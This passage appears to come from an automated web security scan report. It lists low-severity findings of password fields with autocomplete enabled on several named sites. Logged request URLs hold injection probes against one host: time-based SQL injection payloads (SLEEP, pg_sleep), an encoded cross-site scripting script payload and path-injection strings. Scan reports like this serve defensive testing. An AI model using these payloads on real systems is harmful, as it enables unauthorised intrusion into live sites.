Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.282. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.283. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.284. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:42 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:42 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.285. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.286. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.287. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:55 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.288. http://mail.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">


<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" /></td>
...[SNIP]...
18.289. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';        
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...
18.290. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...
18.291. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&amp;st.cmd=anonymLogin&amp;tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...
18.292. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
       <form method="post" action="/a-logon/" name="login">
           <input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............&nbsp;<input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...
18.293. http://pretty.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<td>
        <form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<input type="text" name="auid" id="auid" size="10">
            ............ <input type="password" size="10" name="password" id="password">
            <input type="submit" value=".........." class="button">
...[SNIP]...
18.294. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: http://www.trust-guard.com/Website-Security-s/89.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:31:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=u4eu14e9is22aoq9meeuch3fu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
lid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br />
...[SNIP]...
<td>
<input id="txtPassword" name="txtPassword" type="password" value="" style="width: 200px" onblur="validatePresent(this,'msg_pass');" /> </td>
...[SNIP]...
18.295. https://secure.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966; PHPSESSID=rphnh41r6qngg9nd1ml443go23

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:35:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
lid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br />
...[SNIP]...
<td>
<input id="txtPassword" name="txtPassword" type="password" value="" style="width: 200px" onblur="validatePresent(this,'msg_pass');" /> </td>
...[SNIP]...
18.296. https://support.comodo.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:08 GMT
Server: Apache
Set-Cookie: SWIFT_sessionid40=3cdw2l8ir5jntocrfhfyvrg8o00usui3; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...
18.297. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?loginresult=-5&group=comodo HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://support.comodo.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=1g4f03q2uixdg6t4rvkbe9weba00vg2a

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:48:25 GMT
Server: Apache
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%223%22%3B%7D; expires=Tue, 24-Apr-2012 19:48:25 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
